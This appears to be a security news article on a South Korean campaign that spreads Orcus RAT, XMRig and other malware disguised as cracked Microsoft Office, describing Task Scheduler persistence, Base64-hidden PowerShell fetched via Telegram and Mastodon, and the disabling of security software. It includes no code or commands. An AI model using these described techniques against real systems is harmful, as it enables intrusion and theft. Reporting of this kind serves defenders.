%20(2).webp "Hackers are using cracked versions of MS Office to distribute malware")
In South Korea, cyber attackers have been found distributing malware disguised as cracked software, such as Remote Access Trojans (RATs) and cryptocurrency miners. These malicious actors are using various tactics to ensure persistence on infected systems, even after the initial malware is removed.
One method being employed by the attackers involves registering themselves with the Task Scheduler, a Windows utility that allows users to automate tasks. By doing so, the malware is able to trigger PowerShell commands that download and install new variants of the original malware. The constantly changing PowerShell commands make it difficult for unpatched systems to defend against information theft, proxy abuse, and cryptocurrency mining.
The attackers are also utilizing file-sharing platforms to distribute malware disguised as cracked versions of popular software like Microsoft Office. During the infection process, the malware retrieves a download URL and target platform, potentially allowing the attackers to tailor their attacks and evade detection more effectively.
The malware, which is developed in .NET, uses obfuscation techniques to hide its malicious code. Initially, it accessed the messaging platform Telegram to retrieve a download URL. Newer versions of the malware contain multiple Telegram URLs and a Mastodon URL, each with a unique string linked to a cloud storage URL on either Google Drive or GitHub.
Within these cloud storage locations, the threat actors hide malicious PowerShell commands using Base64 encoding for further obfuscation. Once executed, these commands install additional malware strains on the compromised system.
One specific malware variant, known as “software_reporter_tool.exe,” uses a PowerShell script to download and maintain persistence on the system. This malware creates a malicious executable file at a specific location and uses a compromised installation of 7zip to decompress a password-protected archive from either GitHub or Google Drive. By mirroring tactics from previous campaigns, the attackers aim to ensure their malware remains active and undetected.
Furthermore, the attackers leverage the Task Scheduler to ensure that their malicious updater software continues to operate after a system reboot. The scheduled task triggers a PowerShell script for further updates and potential malware installations, allowing the attackers to maintain control over the compromised system.
On the compromised systems, the attackers deploy Orcus RAT and XMRig. Orcus RAT is capable of stealing information through keylogging, webcam access, and screenshot capture, while XMRig is used for cryptocurrency mining.
XMRig is configured to stop mining when resource-intensive programs are running, and it can terminate processes that compete for resources, such as security software installers. Additionally, the attackers use 3Proxy to turn the infected machine into a proxy server by adding a firewall rule and injecting itself into a legitimate process.
According to security researchers at ASEC, PureCrypter downloads and executes further payloads, while the AntiAV malware disrupts security products by modifying their configuration files.
In conclusion, the attackers in South Korea are distributing malware disguised as popular software through file-sharing sites, bypassing detection with frequent updates and utilizing the Task Scheduler for persistence. This leads to repeated infections on systems even after the initial malware is removed. It is crucial for users to exercise caution when downloading software from untrusted sources and to keep their systems updated with the latest security patches to prevent falling victim to such attacks.